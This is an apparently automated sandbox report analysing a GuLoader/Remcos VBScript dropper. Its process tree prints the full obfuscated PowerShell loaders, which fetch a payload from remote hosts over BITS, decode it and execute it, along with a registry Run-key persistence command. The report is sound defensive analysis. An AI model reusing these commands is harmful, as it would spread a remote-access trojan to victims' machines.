Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BKGCONF-THD1914129-BKGCONF-THD1914129.vbs

Overview

General Information

Sample name:BKGCONF-THD1914129-BKGCONF-THD1914129.vbs
Analysis ID:1410613
MD5:62362dc3fc9d67f81dd8bcd670e8c117
SHA1:c871994bee2042d4cac07220e283166c3f58aa3f
SHA256:e9144edc2096347981ed7ea94f6898cfd400918558cb0aba2f4edabbe472cf61
Tags:GuLoadervbs
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 2428 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1960 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents $Havartis;} else {;$Chlorocarbon216=quenchlessness ' Net,SHj,pet MedmaAcoelr ThiotGal.e-Svi.eBDe.atiBindet M,dosRe.rsTo.sporOmentaud ign WennssynkrfUnmete Kalvr Ungo ompa-DialeS andlo Kon uForgir SkrucHypoceulovl P,eud$ BramPMiscolL,stoa,turtnCronetSo nee mutts EnerkSfa toMetrolNu bieStenbssalgs Langt- onfiDMaddieVejrfs Gr,ot A cuiUnmagnGld sa kalktNoniniGenopoKo.lenIntra A,try$HagbaVGrappa ProrlU,thusGermaeNonobn T.ibdAfskreGuar sRecid ';&($Affattendes62) (quenchlessness 'Zyg e$ PoluVEnganaT.rsklNongesPellaeRu lenMi.jpdF rgaeErot.sPrint= Abst$F.rtreTortsnSprinvC,ank: errea.hrespnosogpSpoond ZimbasyncrtBe fiaAccru ') ;&($Affattendes62) (quenchlessness 'Ov.rjIShaham Fo.ypStalloGli.mrU,nmatXenop- algdMTechnoKonced Kamau.sesilCelureBond. Da,otBOpkl.i BefutSprngsKomp,Ttelepr mortaAppr n.angesimputfKlendeseg.erKi.de ') ;$Valsendes=$Valsendes+'\Ototoxicity.Non';while (-not $Rkenlandskaben) {&($Affattendes62) (quenchlessness 'Delsa$.esegRBi inkLngdeeKnowln skollArendaVinklnUnsatdGe.tisbaggrkSlak aCorribSero.eAgternOv.rs=.yncy( CounTPrinte Senes Ov rtFyldn-Almg PAsy,paMisiotIn xthKo si Fjedd$ SkolVEnsn,aKampulBladlsTunneeSprinnSecredGradae Af lsG,rlo)Coker ') ;&($Affattendes62) $Chlorocarbon216;&($Affattendes62) (quenchlessness 'Un.erSdyspntBeaklaTilpar Antithawks-ModarSbaadelUprigeCentieFre,tpPr.ff itu5Tippl ');$Planteskoles=$Udenrigsredaktrerne[$havbiologers++%$Udenrigsredaktrerne.count];}&($Affattendes62) (quenchlessness 'Aaben$FigurFKomonrPr.fuiInt.rf O eruIm acnSnorsdUntainKrafteKasersTingf2Smin,4Unswa9David Rette=,deno MurziGDeponemultitAchie-MalacCDarneo StranflyvetrisoteGar enIncudtFremg Foru$filkaVViatiaC mmulStinks PhyleforannAareldSkovle Holos,mmet ');&($Affattendes62) (quenchlessness 'Krema$overaMAbiogaChapalBasibgDybvarGallo Folke=Pyrom Tegne[ForskSjeopay Spagsoff,ntLolloe,rabamMisch.Is,gaCFolksoAnlben DissvLertjeTenibr hirtMetro]Uls.e: Mark:SitopFLandbrhypoho Col,mDioptBA tena Ordas Fo,ee Tyra6 Opsk4T lsaS.ejret G llrUnmaniAccr.nAutocgPhili(Ecoci$CamphF.palsrPhotoiSupe,fIndf uHalvdn DansdU,rulnAnticeAftvts Ret 2Fi te4Neotr9Kro.s) Onyc ');&($Affattendes62) (quenchlessness ' yclo$EpaxiUToughnTolu,dConsooPa donUdkaneDecol2di,ul3 Hk.e9Arbej G.nbr=,vlst Blenn[Fde,aSRubleyFabr.sConsitl.teleTcku mExpec. S.ooT SkrieMoriaxDrumltArcht.Spor E Stten LadycKejseoBarord.usleiSte snEmajagUrefl]Forms:Preen:,ipefAPastoSe sprC,oculIHomoeIextre. KirkGBarbie,tatutArchnS lpert endirKraveiSurf.n,edisg Cock(.kabe$BalleMEffekaHallml AmphgnothirMaidl) ,obb ');&($Affattendes62) (quenchlessness 'ambys$ onjuDB.omci Pa,tmPremieinfrat NotorHvemao nspndFrankoHoftenUnimp=Fores$HylomUHoundnJingadUnhomoBanden ente necd2 Cr,m3Bors,9Bolig.T uthsUdvalu A tib TrdnsN.nnit.oredrPackwi Gennn RdsegVitia(Longe3Verg 3Polyp6 Nvni5Korre4.hedt7Brahm,Upcra2.arru5 Incu8He.od1Hypo 8Mod,m)Decel ');&($Affattendes62) $Dimetrodon;} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1628 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents $Havartis;} else {;$Chlorocarbon216=quenchlessness ' Net,SHj,pet MedmaAcoelr ThiotGal.e-Svi.eBDe.atiBindet M,dosRe.rsTo.sporOmentaud ign WennssynkrfUnmete Kalvr Ungo ompa-DialeS andlo Kon uForgir SkrucHypoceulovl P,eud$ BramPMiscolL,stoa,turtnCronetSo nee mutts EnerkSfa toMetrolNu bieStenbssalgs Langt- onfiDMaddieVejrfs Gr,ot A cuiUnmagnGld sa kalktNoniniGenopoKo.lenIntra A,try$HagbaVGrappa ProrlU,thusGermaeNonobn T.ibdAfskreGuar sRecid ';&($Affattendes62) (quenchlessness 'Zyg e$ PoluVEnganaT.rsklNongesPellaeRu lenMi.jpdF rgaeErot.sPrint= Abst$F.rtreTortsnSprinvC,ank: errea.hrespnosogpSpoond ZimbasyncrtBe fiaAccru ') ;&($Affattendes62) (quenchlessness 'Ov.rjIShaham Fo.ypStalloGli.mrU,nmatXenop- algdMTechnoKonced Kamau.sesilCelureBond. Da,otBOpkl.i BefutSprngsKomp,Ttelepr mortaAppr n.angesimputfKlendeseg.erKi.de ') ;$Valsendes=$Valsendes+'\Ototoxicity.Non';while (-not $Rkenlandskaben) {&($Affattendes62) (quenchlessness 'Delsa$.esegRBi inkLngdeeKnowln skollArendaVinklnUnsatdGe.tisbaggrkSlak aCorribSero.eAgternOv.rs=.yncy( CounTPrinte Senes Ov rtFyldn-Almg PAsy,paMisiotIn xthKo si Fjedd$ SkolVEnsn,aKampulBladlsTunneeSprinnSecredGradae Af lsG,rlo)Coker ') ;&($Affattendes62) $Chlorocarbon216;&($Affattendes62) (quenchlessness 'Un.erSdyspntBeaklaTilpar Antithawks-ModarSbaadelUprigeCentieFre,tpPr.ff itu5Tippl ');$Planteskoles=$Udenrigsredaktrerne[$havbiologers++%$Udenrigsredaktrerne.count];}&($Affattendes62) (quenchlessness 'Aaben$FigurFKomonrPr.fuiInt.rf O eruIm acnSnorsdUntainKrafteKasersTingf2Smin,4Unswa9David Rette=,deno MurziGDeponemultitAchie-MalacCDarneo StranflyvetrisoteGar enIncudtFremg Foru$filkaVViatiaC mmulStinks PhyleforannAareldSkovle Holos,mmet ');&($Affattendes62) (quenchlessness 'Krema$overaMAbiogaChapalBasibgDybvarGallo Folke=Pyrom Tegne[ForskSjeopay Spagsoff,ntLolloe,rabamMisch.Is,gaCFolksoAnlben DissvLertjeTenibr hirtMetro]Uls.e: Mark:SitopFLandbrhypoho Col,mDioptBA tena Ordas Fo,ee Tyra6 Opsk4T lsaS.ejret G llrUnmaniAccr.nAutocgPhili(Ecoci$CamphF.palsrPhotoiSupe,fIndf uHalvdn DansdU,rulnAnticeAftvts Ret 2Fi te4Neotr9Kro.s) Onyc ');&($Affattendes62) (quenchlessness ' yclo$EpaxiUToughnTolu,dConsooPa donUdkaneDecol2di,ul3 Hk.e9Arbej G.nbr=,vlst Blenn[Fde,aSRubleyFabr.sConsitl.teleTcku mExpec. S.ooT SkrieMoriaxDrumltArcht.Spor E Stten LadycKejseoBarord.usleiSte snEmajagUrefl]Forms:Preen:,ipefAPastoSe sprC,oculIHomoeIextre. KirkGBarbie,tatutArchnS lpert endirKraveiSurf.n,edisg Cock(.kabe$BalleMEffekaHallml AmphgnothirMaidl) ,obb ');&($Affattendes62) (quenchlessness 'ambys$ onjuDB.omci Pa,tmPremieinfrat NotorHvemao nspndFrankoHoftenUnimp=Fores$HylomUHoundnJingadUnhomoBanden ente necd2 Cr,m3Bors,9Bolig.T uthsUdvalu A tib TrdnsN.nnit.oredrPackwi Gennn RdsegVitia(Longe3Verg 3Polyp6 Nvni5Korre4.hedt7Brahm,Upcra2.arru5 Incu8He.od1Hypo 8Mod,m)Decel ');&($Affattendes62) $Dimetrodon;} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • wab.exe (PID: 5548 cmdline: C:\Program Files (x86)\windows mail\wab.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wscript.exe (PID: 2300 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • WmiPrvSE.exe (PID: 5244 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
            • powershell.exe (PID: 5312 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbatn.ibboeScarfsBefips.iljg Skink-LagerDCuiraeSamfusLap,etI dumiPri mnLarynaRecont SquaiFlybloAlfefn Coun Chif$TelluSBes.retaarek SpkhsSagtetHesteuF rarrWla,isDiner ';&($Batiste) (Cert69 'Re ri$ StanSSpdeke Kni.kPortesTrkpltB,ctruLuminrHemiesNubig=Offen$Totrie Burenopis.vFuld :.onpaaBlindpSvi.rpI jekd ,runaGuld.tSmanda,ille ') ;&($Batiste) (Cert69 'SerbiIIndifmE,erepskn,eo Foger Mongt Reci-.urtiMreat.o Tilsd DomeuA frel H.nde Fang Na urBKontriLy,tet Lic sMa,moTLoamir,niataUdkonnU.trasTirvef SrsteBole.rBenzy ') ;$Seksturs=$Seksturs+'\Hovedbygningens.Cou';while (-not $Afmonteringernes) {&($Batiste) (Cert69 'Sikke$TrskoASter fMonopmNondeocurionmu.hntCopreeFr turFiltriToftenNyskrgSyn.heCenterSkuldnSippeetennisNedlu= anre(DecasT ForheForelsR,tratAffa - Le,uP TranaNasc.t An shTomle Perif$ Fir,SKldereDeci.kVej.es undktUnferuTast rSelvrsSlagt)V kat ') ;&($Batiste) $Thysen;&($Batiste) (Cert69 'sawloS Desst FamiaChartrforhot utro-AliamS Lokol SitheCo leeGlarrp Ga.t Jamn 5Preba ');$uppishness=$Wergilds[$Sureste++%$Wergilds.count];}&($Batiste) (Cert69 ' Trg $pulveNTreaceLyriccLin.etCanguaFortrn Thead SvanrB gflaPhoto Nyord= Pred UdkldGBrndseFritnt rako-Un,bsCDunstoMillinConcrt Cu iemikron mo.utstart Lykke$DomicSAspise ohorkgalsisK,rdutPe aluOutscr Jos s ovtr ');&($Batiste) (Cert69 'Ref,o$ Vel,oTittemDom,rk.ovieaFritir,epart Trife S.lirSeni,iKalibnSkaktgStikbs Com koler=Kreat rave[Un orSKreplyDiebasAfvejtAnsige San,mfor.o.OppugCUn eco .vern StenvSi,dse InsnrkreretSkoss]Ninet:tale,:ArvelFWaughr Cravo Jen mOn chBSkralaRh.pis usikeDiol,6Phone4 Typ.SEksamtXyl,prZoneliPar enSe.ilgShant( Medu$SolvoNForedeAurigcSlit,tFo.vaaS attnTraildUnlovr EpidaDatab) Reko ');&($Batiste) (Cert69 'Lugma$ SampN FotooO igonTvet,p Co neVenesrSlamsvLnklaeSekserCist sPolytiEnfolv UltreEfter Indre=Marke B au[RdbysSMi.veyUnltrsSoaprtMasteeEl.omm Harp.FliseTSummeeBellyxRefo,tSc,em.Sep,eEM.veon Se icSetulo HeksdRedisiP.llinTjensg un e] Li,e: udhn: ApteAMom nSPokalCka.toISpindIFl.gt..ademGberhyeAdelhtEyehoS rabtCountrHuishiDetacnC,olegQueth(gesti$Vrdiso SamsmOxysakSorteaPenolrPassetOplsneSlv irCoenai BedenBelasg Multsbarne)P,cti ');&($Batiste) (Cert69 'Alcor$AmalgJForkaoHouopg OvergTrlleiAnme,nRo.kegUnivet naarjInfan=Anstt$Und,rNB.rnao Waganpa ajpVenskeImpotrChildv CoeleMonolrVinifs bliti,rawevDdelieArgen.B,lbosS,badu,alambLi.fas PolktInfierEpipai,ransnInforgRadbr( Sej.2Taman9Las,r6Sprre5 Cl,i3 Bamb1Nachs,Tyros2Lakmu5 Ga e8 Stje7 ider3 ord)O.fic ');&($Batiste) $Joggingtj;} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • wab.exe (PID: 6380 cmdline: C:\Program Files (x86)\windows mail\wab.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 5960 cmdline: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside) MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 6776 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • svchost.exe (PID: 4568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2804880582.0000000008BF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000005.00000002.2804900033.0000000008CCE000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 1628INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x537cf:$b2: ::FromBase64String(
          • 0x45a1a:$s1: -join
          • 0x964f6:$s1: -join
          • 0xa35cb:$s1: -join
          • 0xa699d:$s1: -join
          • 0xa704f:$s1: -join
          • 0xa8b40:$s1: -join
          • 0xaad46:$s1: -join
          • 0xab56d:$s1: -join
          • 0xabddd:$s1: -join
          • 0xac518:$s1: -join
